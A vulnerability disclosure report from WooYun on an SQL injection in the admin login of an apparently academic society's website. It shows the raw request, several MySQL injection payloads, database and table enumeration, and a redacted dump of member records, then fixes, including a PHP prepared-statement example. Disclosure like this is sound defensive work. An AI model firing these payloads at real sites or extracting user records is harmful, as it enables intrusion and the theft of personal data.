WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article reader ------------------------ http://drop.zone.ci/
2015-10-15: Details sent to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details visible to the vendor only
2015-10-29: Details opened to core white hats and domain experts
2015-11-08: Details opened to regular white hats
2015-11-18: Details opened to intern white hats
2015-12-03: Details opened to the public

I hear the vendor is decent.
POST /admin/logadmin.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin/login.php
Cookie: PHPSESSID=bjgoj8dp2q76m7n7hnhcq17616
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=admin&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16

The username parameter is injectable.

Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=admin' RLIKE IF(5126=5126,0x61646d696e,0x28) AND 'tyOj'='tyOj&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x3a6f73763a,(SELECT (CASE WHEN (8851=8851) THEN 1 ELSE 0 END)),0x3a69746b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xitt'='xitt&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: username=-3463' OR 8168=SLEEP(5) AND 'Zmqa'='Zmqa&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
---
web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] orsc_web

Database: orsc_web
[6 tables]
+---------+
| admin   |
| conlist |
| const   |
| content |
| member  |
| message |
+---------+

web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
Database: orsc_web
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 1184    |
+--------+---------+

Pulled two random users to have a look (personal values in the dump below are replaced with [redacted]; the original report shows them in the clear, including plaintext passwords and national ID numbers):

Table: member
[2 entries]
| mem_id | mem_ri | mem_yue | mem_shi | mem_pic | mem_time | mem_name | mem_type | mem_nian | mem_zhuye | mem_email | mem_sheng | mem_dizhi | mem_minzu | mem_number | mem_wenhua | mem_jianli | mem_shouji | mem_danwei | mem_status | mem_dangpai | mem_dianhua | mem_xingbie | mem_youbian | mem_nicheng | mem_password | mem_zhicheng | mem_daoqishijian | mem_shenfenzheng | mem_zhichengdengji | mem_renzhiqingkuang |
| 8 | 9 | 1 | 海淀区 | uploadfile/pic/1352815576.jpg | 2012-11-13 10:01:06 | [redacted] | 1 | [redacted] | http://**.**.**.** | [redacted]@**.**.**.** | 北京 | [redacted] | 汉族 | [redacted] | 博士 | [redacted] | [redacted] | 中国科学院数学与系统科学研究院 | 7 | 无 | [redacted] | 男 | 100190 | [redacted] | [redacted] | 副教授 | 2099 | [redacted] | 高级 | 2000-今:中国运筹学会常务副秘书长 |
| 14 | 1 | 1 | 哈尔滨 | uploadfile/pic/1359356276.jpg | 2013-01-28 03:44:07 | [redacted] | 1 | [redacted] | **.**.**.** | [redacted]@**.**.**.** | 黑龙江 | [redacted] | 汉 | [redacted] | 博士研究生 | <blank> | [redacted] | 哈尔滨工业大学教师 | 7 | 共产党员 | [redacted] | 男 | 150010 | [redacted] | [redacted] | 副教授 | 2099 | <blank> | 高级 | <blank> |

Admin backend
1. Do not expose the admin backend.
2. Use parameterized SQL queries and filter keywords.
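As an added illustration of fix item 2 (this is example code, not the report's or the affected site's code), the login handler below takes the form fields the request above sends but never splices them into SQL text, so quotes, RLIKE, SLEEP() or CONCAT in the username are matched as literal characters rather than evaluated. The table and column names (admin.username, admin.password_hash) and the sample account are assumptions; the report targets MySQL, and an in-memory SQLite database is used only to keep the demo self-contained.

```php
<?php
// Added example: hardened replacement for a PHP login handler such as
// /admin/logadmin.php. Not the site's own code; schema is assumed.
declare(strict_types=1);

function openDb(): PDO
{
    // SQLite in memory so the example runs without a MySQL server. Against
    // MySQL the same code works with a mysql: DSN.
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO admin (username, password_hash) VALUES (:u, :h)');
    // Constructed sample account. The password is hashed at insert time; the
    // dump in the report shows member passwords stored in the clear.
    $ins->execute([':u' => 'admin', ':h' => password_hash('sample-only-secret', PASSWORD_DEFAULT)]);
    return $db;
}

function authenticate(PDO $db, string $username, string $password): bool
{
    // The vulnerable pattern looks like:
    //   "SELECT ... FROM admin WHERE username='$username' AND password='$password'"
    // Here the SQL text is fixed and the value travels separately as a
    // bound parameter, so the driver never parses user input as SQL.
    $stmt = $db->prepare('SELECT password_hash FROM admin WHERE username = :username LIMIT 1');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // unknown user
    }
    // Compare against the stored hash; never compare plaintext columns.
    return password_verify($password, $row['password_hash']);
}

$db = openDb();
var_dump(authenticate($db, 'admin', 'sample-only-secret')); // valid credentials
var_dump(authenticate($db, 'admin', 'admin'));              // wrong password
// The boolean-based shape from the report, passed as plain data: no row matches.
var_dump(authenticate($db, "admin' AND 'tyOj'='tyOj", 'admin'));
```

When the DSN is MySQL, also pass `PDO::ATTR_EMULATE_PREPARES => false` so binding happens in the server rather than by client-side string escaping. Keyword filtering (the second half of fix item 2) is at best defence in depth: blacklists miss encodings and alternative syntax, whereas a prepared statement removes the injection regardless of what the input contains.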
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-10-19 18:16
CNVD confirmed and reproduced the described vulnerability and has forwarded it via CNCERT to the Chinese Academy of Sciences, which will coordinate handling with the unit that operates the website.
None yet.